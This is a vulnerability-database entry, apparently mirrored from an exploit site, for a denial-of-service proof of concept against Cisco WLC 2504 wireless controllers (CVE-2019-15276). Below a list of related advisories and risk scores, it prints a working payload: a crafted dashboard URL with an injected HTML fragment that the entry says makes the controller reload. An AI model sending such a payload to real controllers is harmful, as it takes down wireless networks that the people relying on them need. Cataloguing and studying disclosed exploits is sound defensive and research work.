Cisco WLC 2504 8.9 - Denial of Service Exploit

🗓️ 04 Dec 2019 00:00:00Reported by SecuNinjaType

zdt🔗 0day.today👁 280 Views

Cisco WLC 2504 8.9 Denial of Service Exploi

Reporter	Title	Published	Views	Family All 15
BDU FSTEC	The vulnerability of the Cisco Wireless LAN Controller web interface allows a perpetrator to trigger a service failure.	9 Dec 201900:00	–	bdu_fstec
Circl	CVE-2019-15276	28 Feb 202408:07	–	circl
Cisco	Cisco Wireless LAN Controller HTTP Parsing Engine Denial of Service Vulnerability	6 Nov 201916:00	–	cisco
Tenable Nessus	Cisco Wireless LAN Controller HTTP Parsing Engine Denial of Service Vulnerability	22 Nov 201900:00	–	nessus
CNVD	Cisco Wireless LAN Controller Software Input Validation Error Vulnerability (CNVD-2019-39768)	6 Nov 201900:00	–	cnvd
CVE	CVE-2019-15276	26 Nov 201903:12	–	cve
Cvelist	CVE-2019-15276 Cisco Wireless LAN Controller HTTP Parsing Engine Denial of Service Vulnerability	26 Nov 201903:12	–	cvelist
Exploit DB	Cisco WLC 2504 8.9 - Denial of Service (PoC)	4 Dec 201900:00	–	exploitdb
exploitpack	Cisco WLC 2504 8.9 - Denial of Service (PoC)	4 Dec 201900:00	–	exploitpack
NVD	CVE-2019-15276	26 Nov 201903:15	–	nvd

# Exploit Title: Cisco WLC 2504 8.9 - Denial of Service (PoC)
# Exploit Author: SecuNinja
# Vendor Homepage: cisco.com
# Software Link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20191106-wlc-dos
# Version: 8.4 to 8.9
# Tested on: not applicable, works independent from OS
# CVE : CVE-2019-15276

# Exploit PoC:

https://WLCIPorHostname/screens/dashboard.html#/RogueApDetail/00:00:00:00:00:00">'><img src="xxxxx">

# Firing this code will cause the system to reload which results in a DoS condition.

04 Dec 2019 00:00Current

6.6Medium risk

Vulners AI Score6.6

CVSS 36.5 - 7.7

CVSS 24

EPSS0.31811

SSVC